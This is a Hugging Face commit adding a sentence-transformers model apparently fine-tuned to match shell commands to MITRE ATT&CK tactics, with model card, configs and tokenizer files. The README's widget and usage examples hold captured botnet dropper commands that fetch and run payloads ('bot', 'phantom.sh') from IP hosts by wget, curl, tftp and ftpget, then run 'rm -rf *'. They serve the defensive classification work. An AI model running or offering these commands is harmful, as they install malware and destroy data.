Add new SentenceTransformer model

Browse files

Files changed (11) hide show

1_Pooling/config.json +10 -0
README.md +477 -0
config.json +23 -0
config_sentence_transformers.json +10 -0
model.safetensors +3 -0
modules.json +20 -0
sentence_bert_config.json +4 -0
special_tokens_map.json +51 -0
tokenizer.json +0 -0
tokenizer_config.json +73 -0
vocab.txt +0 -0

1_Pooling/config.json ADDED Viewed

	@@ -0,0 +1,10 @@

+{
+  "word_embedding_dimension": 768,
+  "pooling_mode_cls_token": false,
+  "pooling_mode_mean_tokens": true,
+  "pooling_mode_max_tokens": false,
+  "pooling_mode_mean_sqrt_len_tokens": false,
+  "pooling_mode_weightedmean_tokens": false,
+  "pooling_mode_lasttoken": false,
+  "include_prompt": true
+}

README.md ADDED Viewed

	@@ -0,0 +1,477 @@

+---
+tags:
+- sentence-transformers
+- sentence-similarity
+- feature-extraction
+- generated_from_trainer
+- dataset_size:212
+- loss:CosineSimilarityLoss
+base_model: sentence-transformers/all-mpnet-base-v2
+widget:
+- source_sentence: sh; enable; system; shell; /bin/busybox
+  sentences:
+  - 'Defense Evasion: The adversary is trying to avoid being detected.
+    Defense Evasion consists of techniques that adversaries use to avoid detection
+    throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
+    security software or obfuscating/encrypting data and scripts. Adversaries also
+    leverage and abuse trusted processes to hide and masquerade their malware. Other
+    tactics’ techniques are cross-listed here when those techniques include the added
+    benefit of subverting defenses. '
+  - 'Defense Evasion: The adversary is trying to avoid being detected.
+    Defense Evasion consists of techniques that adversaries use to avoid detection
+    throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
+    security software or obfuscating/encrypting data and scripts. Adversaries also
+    leverage and abuse trusted processes to hide and masquerade their malware. Other
+    tactics’ techniques are cross-listed here when those techniques include the added
+    benefit of subverting defenses. '
+  - 'Lateral Movement: The adversary is trying to move through your environment.
+    Lateral Movement consists of techniques that adversaries use to enter and control
+    remote systems on a network. Following through on their primary objective often
+    requires exploring the network to find their target and subsequently gaining access
+    to it. Reaching their objective often involves pivoting through multiple systems
+    and accounts to gain. Adversaries might install their own remote access tools
+    to accomplish Lateral Movement or use legitimate credentials with native network
+    and operating system tools, which may be stealthier. '
+- source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
+  sentences:
+  - 'Persistence: The adversary is trying to maintain their foothold.
+    Persistence consists of techniques that adversaries use to keep access to systems
+    across restarts, changed credentials, and other interruptions that could cut off
+    their access. Techniques used for persistence include any access, action, or configuration
+    changes that let them maintain their foothold on systems, such as replacing or
+    hijacking legitimate code or adding startup code. '
+  - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
+    \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
+    \ permissions on a system or network. Adversaries can often enter and explore\
+    \ a network with unprivileged access but require elevated permissions to follow\
+    \ through on their objectives. Common approaches are to take advantage of system\
+    \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
+    \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
+    \ admin-like access \n* user accounts with access to specific system or perform\
+    \ specific function\n\nThese techniques often overlap with Persistence techniques,\
+    \ as OS features that let an adversary persist can execute in an elevated context.\
+    \  "
+  - 'Defense Evasion: The adversary is trying to avoid being detected.
+    Defense Evasion consists of techniques that adversaries use to avoid detection
+    throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
+    security software or obfuscating/encrypting data and scripts. Adversaries also
+    leverage and abuse trusted processes to hide and masquerade their malware. Other
+    tactics’ techniques are cross-listed here when those techniques include the added
+    benefit of subverting defenses. '
+- source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
+  sentences:
+  - 'Defense Evasion: The adversary is trying to avoid being detected.
+    Defense Evasion consists of techniques that adversaries use to avoid detection
+    throughout their compromise. Techniques used for defense evasion include uninstalling/disabling
+    security software or obfuscating/encrypting data and scripts. Adversaries also
+    leverage and abuse trusted processes to hide and masquerade their malware. Other
+    tactics’ techniques are cross-listed here when those techniques include the added
+    benefit of subverting defenses. '
+  - 'Execution: The adversary is trying to run malicious code.
+    Execution consists of techniques that result in adversary-controlled code running
+    on a local or remote system. Techniques that run malicious code are often paired
+    with techniques from all other tactics to achieve broader goals, like exploring
+    a network or stealing data. For example, an adversary might use a remote access
+    tool to run a PowerShell script that does Remote System Discovery. '
+  - 'Persistence: The adversary is trying to maintain their foothold.
+    Persistence consists of techniques that adversaries use to keep access to systems
+    across restarts, changed credentials, and other interruptions that could cut off
+    their access. Techniques used for persistence include any access, action, or configuration
+    changes that let them maintain their foothold on systems, such as replacing or
+    hijacking legitimate code or adding startup code. '
+- source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot;
+    chmod 777 *; ./bot; cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://89.110.99.68/bot;
+    chmod 777 *; ./bot
+  sentences:
+  - 'Resource Development: The adversary is trying to establish resources they can
+    use to support operations.
+    Resource Development consists of techniques that involve adversaries creating,
+    purchasing, or compromising/stealing resources that can be used to support targeting.
+    Such resources include infrastructure, accounts, or capabilities. These resources
+    can be leveraged by the adversary to aid in other phases of the adversary lifecycle,
+    such as using purchased domains to support Command and Control, email accounts
+    for phishing as a part of Initial Access, or stealing code signing certificates
+    to help with Defense Evasion.'
+  - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
+    \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
+    \ permissions on a system or network. Adversaries can often enter and explore\
+    \ a network with unprivileged access but require elevated permissions to follow\
+    \ through on their objectives. Common approaches are to take advantage of system\
+    \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
+    \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
+    \ admin-like access \n* user accounts with access to specific system or perform\
+    \ specific function\n\nThese techniques often overlap with Persistence techniques,\
+    \ as OS features that let an adversary persist can execute in an elevated context.\
+    \  "
+  - 'Execution: The adversary is trying to run malicious code.
+    Execution consists of techniques that result in adversary-controlled code running
+    on a local or remote system. Techniques that run malicious code are often paired
+    with techniques from all other tactics to achieve broader goals, like exploring
+    a network or stealing data. For example, an adversary might use a remote access
+    tool to run a PowerShell script that does Remote System Discovery. '
+- source_sentence: cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh;
+    chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod
+    777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh
+    phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
+    74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget
+    -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh
+  sentences:
+  - 'Reconnaissance: The adversary is trying to gather information they can use to
+    plan future operations.
+    Reconnaissance consists of techniques that involve adversaries actively or passively
+    gathering information that can be used to support targeting. Such information
+    may include details of the victim organization, infrastructure, or staff/personnel.
+    This information can be leveraged by the adversary to aid in other phases of the
+    adversary lifecycle, such as using gathered information to plan and execute Initial
+    Access, to scope and prioritize post-compromise objectives, or to drive and lead
+    further Reconnaissance efforts.'
+  - 'Reconnaissance: The adversary is trying to gather information they can use to
+    plan future operations.
+    Reconnaissance consists of techniques that involve adversaries actively or passively
+    gathering information that can be used to support targeting. Such information
+    may include details of the victim organization, infrastructure, or staff/personnel.
+    This information can be leveraged by the adversary to aid in other phases of the
+    adversary lifecycle, such as using gathered information to plan and execute Initial
+    Access, to scope and prioritize post-compromise objectives, or to drive and lead
+    further Reconnaissance efforts.'
+  - "Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\
+    \nPrivilege Escalation consists of techniques that adversaries use to gain higher-level\
+    \ permissions on a system or network. Adversaries can often enter and explore\
+    \ a network with unprivileged access but require elevated permissions to follow\
+    \ through on their objectives. Common approaches are to take advantage of system\
+    \ weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access\
+    \ include: \n\n* SYSTEM/root level\n* local administrator\n* user account with\
+    \ admin-like access \n* user accounts with access to specific system or perform\
+    \ specific function\n\nThese techniques often overlap with Persistence techniques,\
+    \ as OS features that let an adversary persist can execute in an elevated context.\
+    \  "
+pipeline_tag: sentence-similarity
+library_name: sentence-transformers
+---
+# SentenceTransformer based on sentence-transformers/all-mpnet-base-v2
+This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
+## Model Details
+### Model Description
+- **Model Type:** Sentence Transformer
+- **Base model:** [sentence-transformers/all-mpnet-base-v2](https://huggingface.co/sentence-transformers/all-mpnet-base-v2) <!-- at revision 12e86a3c702fc3c50205a8db88f0ec7c0b6b94a0 -->
+- **Maximum Sequence Length:** 384 tokens
+- **Output Dimensionality:** 768 dimensions
+- **Similarity Function:** Cosine Similarity
+<!-- - **Training Dataset:** Unknown -->
+<!-- - **Language:** Unknown -->
+<!-- - **License:** Unknown -->
+### Model Sources
+- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
+- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
+- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
+### Full Model Architecture
+```
+SentenceTransformer(
+  (0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel
+  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
+  (2): Normalize()
+)
+```
+## Usage
+### Direct Usage (Sentence Transformers)
+First install the Sentence Transformers library:
+```bash
+pip install -U sentence-transformers
+```
+Then you can load this model and run inference.
+```python
+from sentence_transformers import SentenceTransformer
+# Download from the 🤗 Hub
+model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
+# Run inference
+sentences = [
+    'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
+    'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
+    'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  ',
+]
+embeddings = model.encode(sentences)
+print(embeddings.shape)
+# [3, 768]
+# Get the similarity scores for the embeddings
+similarities = model.similarity(embeddings, embeddings)
+print(similarities.shape)
+# [3, 3]
+```
+<!--
+### Direct Usage (Transformers)
+<details><summary>Click to see the direct usage in Transformers</summary>
+</details>
+-->
+<!--
+### Downstream Usage (Sentence Transformers)
+You can finetune this model on your own dataset.
+<details><summary>Click to expand</summary>
+</details>
+-->
+<!--
+### Out-of-Scope Use
+*List how the model may foreseeably be misused and address what users ought not to do with the model.*
+-->
+<!--
+## Bias, Risks and Limitations
+*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
+-->
+<!--
+### Recommendations
+*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
+-->
+## Training Details
+### Training Dataset
+#### Unnamed Dataset
+* Size: 212 training samples
+* Columns: <code>sentence_0</code>, <code>sentence_1</code>, and <code>label</code>
+* Approximate statistics based on the first 212 samples:
+  |         | sentence_0                                                                        | sentence_1                                                                           | label                                                         |
+  |:--------|:----------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:--------------------------------------------------------------|
+  | type    | string                                                                            | string                                                                               | float                                                         |
+  | details | <ul><li>min: 4 tokens</li><li>mean: 65.7 tokens</li><li>max: 384 tokens</li></ul> | <ul><li>min: 82 tokens</li><li>mean: 103.74 tokens</li><li>max: 153 tokens</li></ul> | <ul><li>min: 0.0</li><li>mean: 0.5</li><li>max: 1.0</li></ul> |
+* Samples:
+  | sentence_0                                                                 | sentence_1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      | label            |
+  |:---------------------------------------------------------------------------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------|
+  | <code>sh; enable; klv1234; system; shell; echo "string" </code>            | <code>Initial Access: The adversary is trying to get into your network.<br><br>Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.</code>                                                                                                                                                                                                                                                                                                                                         | <code>0.0</code> |
+  | <code>sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox</code> | <code>Lateral Movement: The adversary is trying to move through your environment.<br><br>Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. </code>                                                                                                                                                                                                     | <code>0.0</code> |
+  | <code>enable; ; linuxshell; ; system; ; sh; ; /bin/busybox</code>          | <code>Privilege Escalation: The adversary is trying to gain higher-level permissions.<br><br>Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: <br><br>* SYSTEM/root level<br>* local administrator<br>* user account with admin-like access <br>* user accounts with access to specific system or perform specific function<br><br>These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  </code> | <code>1.0</code> |
+* Loss: [<code>CosineSimilarityLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cosinesimilarityloss) with these parameters:
+  ```json
+  {
+      "loss_fct": "torch.nn.modules.loss.MSELoss"
+  }
+  ```
+### Training Hyperparameters
+#### Non-Default Hyperparameters
+- `per_device_train_batch_size`: 4
+- `per_device_eval_batch_size`: 4
+- `num_train_epochs`: 10
+- `multi_dataset_batch_sampler`: round_robin
+#### All Hyperparameters
+<details><summary>Click to expand</summary>
+- `overwrite_output_dir`: False
+- `do_predict`: False
+- `eval_strategy`: no
+- `prediction_loss_only`: True
+- `per_device_train_batch_size`: 4
+- `per_device_eval_batch_size`: 4
+- `per_gpu_train_batch_size`: None
+- `per_gpu_eval_batch_size`: None
+- `gradient_accumulation_steps`: 1
+- `eval_accumulation_steps`: None
+- `torch_empty_cache_steps`: None
+- `learning_rate`: 5e-05
+- `weight_decay`: 0.0
+- `adam_beta1`: 0.9
+- `adam_beta2`: 0.999
+- `adam_epsilon`: 1e-08
+- `max_grad_norm`: 1
+- `num_train_epochs`: 10
+- `max_steps`: -1
+- `lr_scheduler_type`: linear
+- `lr_scheduler_kwargs`: {}
+- `warmup_ratio`: 0.0
+- `warmup_steps`: 0
+- `log_level`: passive
+- `log_level_replica`: warning
+- `log_on_each_node`: True
+- `logging_nan_inf_filter`: True
+- `save_safetensors`: True
+- `save_on_each_node`: False
+- `save_only_model`: False
+- `restore_callback_states_from_checkpoint`: False
+- `no_cuda`: False
+- `use_cpu`: False
+- `use_mps_device`: False
+- `seed`: 42
+- `data_seed`: None
+- `jit_mode_eval`: False
+- `use_ipex`: False
+- `bf16`: False
+- `fp16`: False
+- `fp16_opt_level`: O1
+- `half_precision_backend`: auto
+- `bf16_full_eval`: False
+- `fp16_full_eval`: False
+- `tf32`: None
+- `local_rank`: 0
+- `ddp_backend`: None
+- `tpu_num_cores`: None
+- `tpu_metrics_debug`: False
+- `debug`: []
+- `dataloader_drop_last`: False
+- `dataloader_num_workers`: 0
+- `dataloader_prefetch_factor`: None
+- `past_index`: -1
+- `disable_tqdm`: False
+- `remove_unused_columns`: True
+- `label_names`: None
+- `load_best_model_at_end`: False
+- `ignore_data_skip`: False
+- `fsdp`: []
+- `fsdp_min_num_params`: 0
+- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
+- `fsdp_transformer_layer_cls_to_wrap`: None
+- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
+- `deepspeed`: None
+- `label_smoothing_factor`: 0.0
+- `optim`: adamw_torch
+- `optim_args`: None
+- `adafactor`: False
+- `group_by_length`: False
+- `length_column_name`: length
+- `ddp_find_unused_parameters`: None
+- `ddp_bucket_cap_mb`: None
+- `ddp_broadcast_buffers`: False
+- `dataloader_pin_memory`: True
+- `dataloader_persistent_workers`: False
+- `skip_memory_metrics`: True
+- `use_legacy_prediction_loop`: False
+- `push_to_hub`: False
+- `resume_from_checkpoint`: None
+- `hub_model_id`: None
+- `hub_strategy`: every_save
+- `hub_private_repo`: None
+- `hub_always_push`: False
+- `gradient_checkpointing`: False
+- `gradient_checkpointing_kwargs`: None
+- `include_inputs_for_metrics`: False
+- `include_for_metrics`: []
+- `eval_do_concat_batches`: True
+- `fp16_backend`: auto
+- `push_to_hub_model_id`: None
+- `push_to_hub_organization`: None
+- `mp_parameters`:
+- `auto_find_batch_size`: False
+- `full_determinism`: False
+- `torchdynamo`: None
+- `ray_scope`: last
+- `ddp_timeout`: 1800
+- `torch_compile`: False
+- `torch_compile_backend`: None
+- `torch_compile_mode`: None
+- `include_tokens_per_second`: False
+- `include_num_input_tokens_seen`: False
+- `neftune_noise_alpha`: None
+- `optim_target_modules`: None
+- `batch_eval_metrics`: False
+- `eval_on_start`: False
+- `use_liger_kernel`: False
+- `eval_use_gather_object`: False
+- `average_tokens_across_devices`: False
+- `prompts`: None
+- `batch_sampler`: batch_sampler
+- `multi_dataset_batch_sampler`: round_robin
+</details>
+### Training Logs
+| Epoch  | Step | Training Loss |
+|:------:|:----:|:-------------:|
+| 9.4340 | 500  | 0.0526        |
+### Framework Versions
+- Python: 3.11.13
+- Sentence Transformers: 4.1.0
+- Transformers: 4.52.4
+- PyTorch: 2.6.0+cu124
+- Accelerate: 1.7.0
+- Datasets: 2.14.4
+- Tokenizers: 0.21.1
+## Citation
+### BibTeX
+#### Sentence Transformers
+```bibtex
+@inproceedings{reimers-2019-sentence-bert,
+    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
+    author = "Reimers, Nils and Gurevych, Iryna",
+    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
+    month = "11",
+    year = "2019",
+    publisher = "Association for Computational Linguistics",
+    url = "https://arxiv.org/abs/1908.10084",
+}
+```
+<!--
+## Glossary
+*Clearly define terms in order to be accessible across audiences.*
+-->
+<!--
+## Model Card Authors
+*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
+-->
+<!--
+## Model Card Contact
+*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
+-->

config.json ADDED Viewed

	@@ -0,0 +1,23 @@

+{
+  "architectures": [
+    "MPNetModel"
+  ],
+  "attention_probs_dropout_prob": 0.1,
+  "bos_token_id": 0,
+  "eos_token_id": 2,
+  "hidden_act": "gelu",
+  "hidden_dropout_prob": 0.1,
+  "hidden_size": 768,
+  "initializer_range": 0.02,
+  "intermediate_size": 3072,
+  "layer_norm_eps": 1e-05,
+  "max_position_embeddings": 514,
+  "model_type": "mpnet",
+  "num_attention_heads": 12,
+  "num_hidden_layers": 12,
+  "pad_token_id": 1,
+  "relative_attention_num_buckets": 32,
+  "torch_dtype": "float32",
+  "transformers_version": "4.52.4",
+  "vocab_size": 30527
+}

config_sentence_transformers.json ADDED Viewed

	@@ -0,0 +1,10 @@

+{
+  "__version__": {
+    "sentence_transformers": "4.1.0",
+    "transformers": "4.52.4",
+    "pytorch": "2.6.0+cu124"
+  },
+  "prompts": {},
+  "default_prompt_name": null,
+  "similarity_fn_name": "cosine"
+}

model.safetensors ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:96d563065765fde808d589bd5352b9ea957e68f98be729839538ed9462f5cc38
+size 437967672

modules.json ADDED Viewed

	@@ -0,0 +1,20 @@

+[
+  {
+    "idx": 0,
+    "name": "0",
+    "path": "",
+    "type": "sentence_transformers.models.Transformer"
+  },
+  {
+    "idx": 1,
+    "name": "1",
+    "path": "1_Pooling",
+    "type": "sentence_transformers.models.Pooling"
+  },
+  {
+    "idx": 2,
+    "name": "2",
+    "path": "2_Normalize",
+    "type": "sentence_transformers.models.Normalize"
+  }
+]

sentence_bert_config.json ADDED Viewed

	@@ -0,0 +1,4 @@

+{
+  "max_seq_length": 384,
+  "do_lower_case": false
+}

special_tokens_map.json ADDED Viewed

	@@ -0,0 +1,51 @@

+{
+  "bos_token": {
+    "content": "<s>",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "cls_token": {
+    "content": "<s>",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "eos_token": {
+    "content": "</s>",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "mask_token": {
+    "content": "<mask>",
+    "lstrip": true,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "pad_token": {
+    "content": "<pad>",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "sep_token": {
+    "content": "</s>",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  },
+  "unk_token": {
+    "content": "[UNK]",
+    "lstrip": false,
+    "normalized": false,
+    "rstrip": false,
+    "single_word": false
+  }
+}

tokenizer.json ADDED Viewed

The diff for this file is too large to render. See raw diff

tokenizer_config.json ADDED Viewed

	@@ -0,0 +1,73 @@

+{
+  "added_tokens_decoder": {
+    "0": {
+      "content": "<s>",
+      "lstrip": false,
+      "normalized": false,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    },
+    "1": {
+      "content": "<pad>",
+      "lstrip": false,
+      "normalized": false,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    },
+    "2": {
+      "content": "</s>",
+      "lstrip": false,
+      "normalized": false,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    },
+    "3": {
+      "content": "<unk>",
+      "lstrip": false,
+      "normalized": true,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    },
+    "104": {
+      "content": "[UNK]",
+      "lstrip": false,
+      "normalized": false,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    },
+    "30526": {
+      "content": "<mask>",
+      "lstrip": true,
+      "normalized": false,
+      "rstrip": false,
+      "single_word": false,
+      "special": true
+    }
+  },
+  "bos_token": "<s>",
+  "clean_up_tokenization_spaces": false,
+  "cls_token": "<s>",
+  "do_lower_case": true,
+  "eos_token": "</s>",
+  "extra_special_tokens": {},
+  "mask_token": "<mask>",
+  "max_length": 128,
+  "model_max_length": 384,
+  "pad_to_multiple_of": null,
+  "pad_token": "<pad>",
+  "pad_token_type_id": 0,
+  "padding_side": "right",
+  "sep_token": "</s>",
+  "stride": 0,
+  "strip_accents": null,
+  "tokenize_chinese_chars": true,
+  "tokenizer_class": "MPNetTokenizer",
+  "truncation_side": "right",
+  "truncation_strategy": "longest_first",
+  "unk_token": "[UNK]"
+}

vocab.txt ADDED Viewed

The diff for this file is too large to render. See raw diff